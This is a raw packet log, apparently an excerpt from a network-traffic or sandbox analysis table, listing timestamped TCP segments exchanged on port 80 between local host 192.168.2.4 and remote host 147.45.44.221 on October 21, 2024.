                                                                                                                                                    Oct 21, 2024 08:47:28.964720964 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964725018 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964764118 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964772940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964806080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964818954 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964848995 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964859009 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964893103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964906931 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964926004 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964941978 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.964958906 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.964971066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965001106 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965013981 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965042114 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965068102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965090990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965090990 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965126991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965142965 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965159893 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965176105 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965212107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965214014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965265036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965267897 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965300083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965312004 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965332985 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965353966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965393066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965395927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965429068 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965451002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965462923 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965468884 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965496063 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965514898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965531111 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965547085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965574980 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965581894 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965615988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965631008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965650082 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965662956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965682983 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965698957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965713024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965729952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965754986 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965764046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965812922 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965816021 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965848923 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965871096 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965883017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965893984 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965917110 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.965929985 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965964079 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.965967894 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966000080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966017008 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966034889 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966048956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966068983 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966083050 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966106892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966115952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966139078 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966155052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966186047 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966190100 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966223955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966239929 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966258049 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966273069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966293097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966305971 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966325045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966341972 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966360092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966376066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966396093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966413021 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966434002 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966443062 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966466904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966481924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966501951 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966515064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966535091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966555119 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966568947 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966584921 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966602087 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966613054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966638088 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966649055 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966670990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966681957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966713905 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.966723919 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.966759920 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.971883059 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.971935987 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.971940041 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.971973896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.971981049 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.972006083 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.972019911 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.972043037 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.972054958 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.972071886 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:28.972089052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:28.972120047 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083038092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083156109 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083200932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083210945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083221912 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083250046 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083254099 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083283901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083297014 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083317995 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083328009 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083367109 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083375931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083430052 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083482027 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083530903 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083534956 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083568096 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083581924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083620071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083621025 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083652020 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083668947 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083684921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083698988 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083718061 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083735943 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083751917 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083776951 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083791971 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083808899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083861113 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083863974 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083909035 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083909988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083952904 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.083956957 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.083986044 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084005117 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084037066 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084043026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084075928 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084093094 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084125996 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084126949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084177017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084181070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084223032 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084228992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084259033 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084278107 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084306002 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084310055 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084359884 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084361076 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084392071 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084402084 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084424019 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084439993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084459066 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084474087 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084486961 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084508896 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084520102 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084531069 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084553957 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084567070 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084583998 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084599972 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084615946 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084630966 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084650993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084661961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084680080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084696054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084712982 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084731102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084744930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084757090 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084774971 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084791899 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084806919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084825993 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084841013 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084850073 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084872007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084883928 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084907055 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084918022 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084944010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084965944 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.084975958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.084991932 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085009098 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085020065 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085042953 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085056067 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085072994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085091114 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085105896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085119009 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085140944 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085155964 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085175991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085190058 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085211039 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085223913 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085243940 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085258961 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085280895 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085289955 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085311890 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085328102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085345984 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085355997 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085381031 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085392952 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085416079 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085427999 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085452080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.085468054 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.085500956 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091123104 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091157913 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091181040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091191053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091197968 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091223955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091240883 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091259003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091270924 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091293097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091304064 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091339111 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091856003 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091909885 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091913939 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091944933 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.091959000 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091985941 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.091995955 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092030048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092048883 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092073917 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092082024 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092128038 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092133045 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092166901 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092194080 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092200041 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092215061 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092245102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092255116 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092307091 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092307091 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092343092 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092367887 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092375040 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092384100 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092428923 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092428923 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092463017 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092483044 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092509985 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092516899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092565060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092567921 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092603922 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092617035 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092633963 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092648983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092667103 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092683077 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:29.092700958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:29.092713118 CEST4973280192.168.2.4147.45.44.221
